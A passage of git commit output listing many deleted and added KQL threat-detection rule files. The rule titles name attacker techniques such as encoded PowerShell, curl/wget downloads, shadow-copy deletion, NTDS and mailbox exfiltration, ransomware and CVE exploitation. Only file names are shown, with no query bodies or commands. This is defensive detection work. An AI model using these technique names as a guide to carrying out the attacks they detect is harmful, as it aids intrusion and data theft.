Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql delete mode 100644 Execution/Start_Windows_Service_Via_Net.EXE.kql delete mode 100644 Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql delete mode 100644 Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql delete mode 100644 Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql delete mode 100644 Execution/Suspicious_Csi.exe_Usage.kql delete mode 100644 Execution/Suspicious_Electron_Application_Child_Processes.kql delete mode 100644 Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql delete mode 100644 Execution/Suspicious_Encoded_PowerShell_Command_Line.kql delete mode 100644 Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql delete mode 100644 Execution/Suspicious_Execution_of_Powershell_with_Base64.kql delete mode 100644 Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql delete mode 100644 Execution/Suspicious_File_Created_In_PerfLogs.kql delete mode 100644 Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql delete mode 100644 Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql delete mode 100644 Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql delete mode 100644 Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql delete mode 100644 Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql delete mode 100644 Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql delete mode 100644 Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql delete mode 100644 Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql delete mode 100644 Execution/Suspicious_HH.EXE_Execution.kql delete mode 100644 Execution/Suspicious_HWP_Sub_Processes.kql delete mode 100644 Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql delete mode 100644 Execution/Suspicious_LOLBIN_AccCheckConsole.kql delete mode 100644 
Execution/Suspicious_Microsoft_Office_Child_Process.kql delete mode 100644 Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql delete mode 100644 Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql delete mode 100644 Execution/Suspicious_Outlook_Child_Process.kql delete mode 100644 Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql delete mode 100644 Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql delete mode 100644 Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql delete mode 100644 Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql delete mode 100644 Execution/Suspicious_PowerShell_Parameter_Substring.kql delete mode 100644 Execution/Suspicious_PowerShell_Parent_Process.kql delete mode 100644 Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql delete mode 100644 Execution/Suspicious_Program_Names.kql delete mode 100644 Execution/Suspicious_RASdial_Activity.kql delete mode 100644 Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql delete mode 100644 Execution/Suspicious_Remote_Child_Process_From_Outlook.kql delete mode 100644 Execution/Suspicious_Runscripthelper.exe.kql delete mode 100644 Execution/Suspicious_Scan_Loop_Network.kql delete mode 100644 Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql delete mode 100644 Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql delete mode 100644 Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql delete mode 100644 Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql delete mode 100644 Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql delete mode 100644 Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql delete mode 100644 Execution/Suspicious_Schtasks_Schedule_Types.kql delete mode 100644 Execution/Suspicious_Script_Execution_From_Temp_Folder.kql delete mode 100644 Execution/Suspicious_Spool_Service_Child_Process.kql delete mode 100644 
Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql delete mode 100644 Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql delete mode 100644 Execution/Suspicious_WSMAN_Provider_Image_Loads.kql delete mode 100644 Execution/Suspicious_WindowsTerminal_Child_Processes.kql delete mode 100644 Execution/Suspicious_WmiPrvSE_Child_Process.kql delete mode 100644 Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql delete mode 100644 Execution/Suspicious_ZipExec_Execution.kql delete mode 100644 Execution/Sysprep_on_AppData_Folder.kql delete mode 100644 Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Tasks_Folder_Evasion.kql delete mode 100644 Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql delete mode 100644 Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql delete mode 100644 Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql delete mode 100644 Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql delete mode 100644 Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql delete mode 100644 Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql delete mode 100644 Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql delete mode 100644 Execution/Unusual_Parent_Process_For_Cmd.EXE.kql delete mode 100644 Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql delete mode 100644 Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql delete mode 100644 Execution/Use_of_FSharp_Interpreters.kql delete mode 100644 Execution/Use_of_OpenConsole.kql delete mode 100644 Execution/Use_of_Pcalua_For_Execution.kql delete mode 100644 Execution/Use_of_Scriptrunner.exe.kql delete mode 100644 Execution/Using_SettingSyncHost.exe_as_LOLBin.kql delete mode 100644 Execution/VBA_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Execution/VMToolsd_Suspicious_Child_Process.kql delete mode 100644 Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql delete mode 100644 
Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql delete mode 100644 Execution/WMIC_Remote_Command_Execution.kql delete mode 100644 Execution/WSL_Child_Process_Anomaly.kql delete mode 100644 Execution/WScript_or_CScript_Dropper_-_File.kql delete mode 100644 Execution/Wab_Execution_From_Non_Default_Location.kql delete mode 100644 Execution/Weak_or_Abused_Passwords_In_CLI.kql delete mode 100644 Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql delete mode 100644 Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/WmiPrvSE_Spawned_A_Process.kql delete mode 100644 Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql delete mode 100644 Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql delete mode 100644 Execution/Wscript_Shell_Run_In_CommandLine.kql delete mode 100644 Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql delete mode 100644 Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql delete mode 100644 Execution/Wusa_Extracting_Cab_Files.kql delete mode 100644 Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql delete mode 100644 Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql delete mode 100644 Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql delete mode 100644 Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql delete mode 100644 Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql delete mode 100644 Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql delete mode 100644 Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql delete mode 100644 Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql delete mode 100644 Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql delete mode 100644 Exfiltration/Email_Exifiltration_Via_Powershell.kql delete mode 100644 Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql delete mode 100644 
Exfiltration/Exports_Registry_Key_To_a_File.kql delete mode 100644 Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql delete mode 100644 Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql delete mode 100644 Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql delete mode 100644 Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql delete mode 100644 Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql delete mode 100644 Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql delete mode 100644 Exfiltration/PUA_-_Rclone_Execution.kql delete mode 100644 Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql delete mode 100644 Exfiltration/Rclone_Config_File_Creation.kql delete mode 100644 Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql delete mode 100644 Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql delete mode 100644 Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql delete mode 100644 Exfiltration/Tap_Installer_Execution.kql delete mode 100644 Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql delete mode 100644 Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql delete mode 100644 Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql delete mode 100644 Impact/Backup_Files_Deleted.kql delete mode 100644 Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql delete mode 100644 Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql delete mode 100644 Impact/Delete_All_Scheduled_Tasks.kql delete mode 100644 Impact/Delete_Important_Scheduled_Task.kql delete mode 100644 Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql delete mode 100644 Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql delete mode 100644 Impact/Disable_Important_Scheduled_Task.kql delete mode 100644 Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql delete mode 100644 Impact/Fsutil_Suspicious_Invocation.kql 
delete mode 100644 Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql delete mode 100644 Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql delete mode 100644 Impact/Network_Communication_With_Crypto_Mining_Pool.kql delete mode 100644 Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql delete mode 100644 Impact/Portable_Gpg.EXE_Execution.kql delete mode 100644 Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql delete mode 100644 Impact/Potential_Crypto_Mining_Activity.kql delete mode 100644 Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql delete mode 100644 Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql delete mode 100644 Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql delete mode 100644 Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql delete mode 100644 Impact/Registry_Disable_System_Restore.kql delete mode 100644 Impact/Renamed_Gpg.EXE_Execution.kql delete mode 100644 Impact/Renamed_Sysinternals_Sdelete_Execution.kql delete mode 100644 Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql delete mode 100644 Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql delete mode 100644 Impact/Stop_Windows_Service_Via_Net.EXE.kql delete mode 100644 Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql delete mode 100644 Impact/Stop_Windows_Service_Via_Sc.EXE.kql delete mode 100644 Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql delete mode 100644 Impact/Suspicious_Execution_of_Shutdown.kql delete mode 100644 Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql delete mode 100644 Impact/Suspicious_Reg_Add_BitLocker.kql delete mode 100644 Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql delete mode 100644 Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql delete mode 100644 Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql delete mode 100644 
Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql delete mode 100644 Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql delete mode 100644 Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql delete mode 100644 Initial Access/ISO_File_Created_Within_Temp_Folders.kql delete mode 100644 Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql delete mode 100644 Initial Access/Office_Macro_File_Creation.kql delete mode 100644 Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql delete mode 100644 Initial Access/Office_Macro_File_Download.kql delete mode 100644 Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Initial Access/Phishing_Pattern_ISO_in_Archive.kql delete mode 100644 Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql delete mode 100644 Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql delete mode 100644 Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql delete mode 100644 Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql delete mode 100644 Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql delete mode 100644 Initial Access/Shell_Process_Spawned_by_Java.EXE.kql delete mode 100644 Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql delete mode 100644 Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql delete mode 100644 Initial Access/Suspicious_Double_Extension_File_Execution.kql delete mode 100644 Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql delete mode 100644 Initial Access/Suspicious_File_Drop_by_Exchange.kql delete mode 100644 Initial Access/Suspicious_HH.EXE_Execution.kql delete mode 100644 Initial Access/Suspicious_HWP_Sub_Processes.kql delete mode 100644 Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql delete mode 100644 Initial 
Access/Suspicious_Microsoft_OneNote_Child_Process.kql delete mode 100644 Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql delete mode 100644 Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql delete mode 100644 Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql delete mode 100644 Initial Access/Terminal_Service_Process_Spawn.kql delete mode 100644 Initial Access/Unusual_Child_Process_of_dns.exe.kql delete mode 100644 Initial Access/Unusual_File_Deletion_by_Dns.exe.kql delete mode 100644 Initial Access/Unusual_File_Modification_by_dns.exe.kql delete mode 100644 Initial Access/Windows_Registry_Trust_Record_Modification.kql create mode 100644 KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql create mode 100644 KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql create mode 100644 KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql create mode 100644 KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql create mode 100644 KQL/rules-emerging-threats/Credential 
Access/potential_russian_apt_credential_theft_activity.kql create mode 100644 KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql create mode 100644 
KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql create mode 100644 
KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql create mode 100644 KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql create mode 100644 
KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql create mode 100644 KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql create mode 100644 KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql create mode 100644 KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql create mode 100644 KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql create mode 100644 KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql create mode 100644 
KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql create mode 100644 KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql create mode 100644 KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql create mode 100644 KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql create mode 100644 KQL/rules-emerging-threats/Execution/fireball_archer_install.kql create mode 100644 KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql create mode 100644 KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql create mode 100644 KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql create mode 100644 KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql create mode 100644 KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql create mode 100644 KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql create mode 100644 KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql create mode 100644 KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql create mode 100644 
KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql create mode 100644 
KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql create mode 100644 
KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql create mode 100644 KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql create mode 100644 KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql create mode 100644 KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql create mode 100644 KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql create mode 100644 KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql create mode 100644 KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql create mode 100644 KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql create mode 100644 